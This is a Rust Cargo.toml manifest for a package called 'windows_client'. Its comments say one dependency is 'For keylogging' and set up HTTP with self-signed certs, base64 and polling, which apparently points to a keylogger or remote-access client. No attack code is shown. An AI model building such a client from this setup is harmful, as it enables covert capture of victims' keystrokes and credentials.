[package]
name = "windows_client"
version = "0.1.0"
edition = "2021"

[dependencies]
reqwest = { version = "0.11", features = ["json", "rustls-tls"] } # Use rustls-tls for self-signed certs
tokio = { version = "1", features = ["full"] } # For async operations
device_query = "1.1.1" # For keylogging
base64 = "0.13" # For Base64 encoding/decoding
serde = { version = "1.0", features = ["derive"] } # For JSON serialization/deserialization
serde_json = "1.0"
futures = "0.3" # For polling interval